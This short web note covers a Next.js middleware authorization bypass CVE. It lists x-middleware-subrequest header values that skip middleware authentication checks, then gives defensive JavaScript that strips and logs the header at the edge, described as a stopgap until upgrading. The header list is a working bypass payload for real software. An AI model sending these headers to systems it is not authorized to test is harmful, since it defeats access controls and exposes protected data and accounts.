A 9.1 CVE that bypasses all middleware authentication by adding an x-middleware-subrequest: middleware header to your GET requests.
List of requests
https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass
x-middleware-subrequest: middleware
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
x-middleware-subrequest: src/middleware
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
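
On the defensive side, the header has no business arriving from outside, so an edge layer can remove it and log the attempt. The following is an added example, not code from the original page or from Next.js; it assumes a Node.js entry point in front of the app whose handler reads req.headers, and the names inspectHeaders, describeFinding and guard are hypothetical.

```javascript
// Added example: strip and log x-middleware-subrequest on requests arriving from outside.
const INTERNAL_HEADER = 'x-middleware-subrequest';

// Split a header object into the headers to forward and the offending values.
// Names are compared case-insensitively; repeated headers may arrive as arrays.
function inspectHeaders(headers) {
  const clean = {};
  const findings = [];
  for (const [name, value] of Object.entries(headers)) {
    if (name.trim().toLowerCase() === INTERNAL_HEADER) {
      findings.push(...(Array.isArray(value) ? value : [value]).map(String));
    } else {
      clean[name] = value;
    }
  }
  return { clean, findings };
}

// Summarise one value for the alert: colon-separated segments and whether
// a single path is repeated (the shape of the longer values listed on this page).
function describeFinding(value) {
  const segments = value.split(':').map((s) => s.trim()).filter(Boolean);
  const distinct = [...new Set(segments)];
  return { paths: distinct, count: segments.length, repeated: segments.length > 1 && distinct.length === 1 };
}

// Wrap a Node (req, res) handler: log the attempt, remove the header, continue.
// Assumption: the wrapped handler reads req.headers.
function guard(handler, log = console.warn) {
  return (req, res) => {
    const { clean, findings } = inspectHeaders(req.headers);
    if (findings.length > 0) {
      log({ event: 'external-x-middleware-subrequest', url: req.url, values: findings.map(describeFinding) });
      req.headers = clean;
    }
    return handler(req, res);
  };
}

// Constructed sample request (not captured traffic), using a value from the list above.
const sampleReq = { url: '/dashboard', headers: { Host: 'app.example', 'X-Middleware-Subrequest': 'src/middleware:src/middleware:src/middleware:src/middleware:src/middleware' } };
const seen = [];
const result = guard((req) => Object.keys(req.headers), (e) => seen.push(e))(sampleReq, {});
console.log(result, JSON.stringify(seen));
```

Stripping at the edge is a stopgap for deployments that cannot be upgraded immediately; the logged events show which routes were probed.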